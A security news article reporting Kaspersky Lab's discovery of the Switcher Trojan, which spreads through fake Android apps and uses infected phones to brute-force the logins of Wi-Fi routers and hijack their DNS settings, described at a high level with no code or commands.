Wi-Fi Routers Infected by Switcher Trojan through Android Mobiles

Kaspersky Lab has identified a highly dangerous new Trojan which has been used to attack Wi-Fi routers through Android devices. The new form of malware, which has been dubbed the Switcher Trojan, is presently being employed to attack routers based in China. Nonetheless, Kaspersky Lab researchers have warned that the new malware could indicate a new and dangerous trend that could well become a world-wide concern.

Ordinarily, attackers take control of Wi-Fi routers by carrying out direct attacks; the new manner of attack, however, is much more efficient. In the case of the Switcher Trojan, hackers infect Android users who are then used as unwitting pawns in Wi-Fi router attacks.

As soon as a user’s device has been compromised, every Wi-Fi router that they try to connect their phone to will suffer a brute force attack. Should the attack succeed, the attackers gains administrator access to the router. This permits them to take full control of the device, meaning that any individual who later connects to the Wi-Fi network will see their own phone, computer or tablet attacked.

So far, the attacks have all begun with either one or the other of two bogus versions of real Chinese apps. The first is used in order to share Wi-Fi network information, the second is an Android client for “Baidu” – a Chinese search engine.

If either app is downloaded, the infected device will proceed to attack the next Wi-Fi network it connects to using a predefined login credentials. A correct combination of username and password combination will permit the attackers to obtain administrator access to the router.

The primary DNS server is then swapped for one that is under the control of the hacker. Additionally, the secondary DNS server is changed – to serve as a backup if the 1st DNS server fails. When this has been performed, any device which connects to the router nay be directed to websites that are controlled by the attackers. The websites may well be laden with malware, be equipped for phishing attacks, subject the connected device to adware, together with a number of other threats. Given that attack involves the whole Wi-Fi network, innumerable users could be infected by the attackers.
Anyone connecting to the network may be directed to a bogus login page for Facebook, Snapchat, Twitter or LinkedIn. The idea is to trick those individuals into entering their login details – providing the attackers with the login credentials of many unsuspecting users. Countless malware may potentially be downloaded to devices that connect to an infected router. As popular Wi-Fi networks are the ideal targets, a huge number of individuals could be infected following a successful attack.

Nikita Buckha, a researcher at Kaspersky Lab, has advised that the changes made by the attackers to the DNS settings are not easy to detect. If the Wi-Fi operator neglects to check their DNS settings at regular intervals, it is improbable that they will notice that someone has hijacked the Wi-Fi router. Moreover, Buckha believes that the change is a persistent one and can survive a reboot.

Buckha has claimed that the criminals responsible for the campaign have created a website to promotes the 2 apps. The same site also serves as the command and control center of the attackers. The website’s own security was weak, which allowed Kaspersky Lab to access a table displaying the number of routers that had already been infected. As of the date of Nikita Buckha’s blog post (which announced the discovery of the Switcher Trojan) 1,280 Wi-Fi routers, all in China, had already been compromised.

Twitter Facebook LinkedIn Reddit Copy link Link copied to clipboard
Photo of author

Posted by

Emma Taylor

Emma Taylor is the contributing editor of Defensorum. Emma started on Defensorum as a news writer in 2017 and was promoted to editor in 2022. Emma has written and edited several hundred articles related to IT security and has developed a deep understanding of the sector. You can follow Emma on https://twitter.com/defensorum and contact Emma at emmataylor@defensorum.com.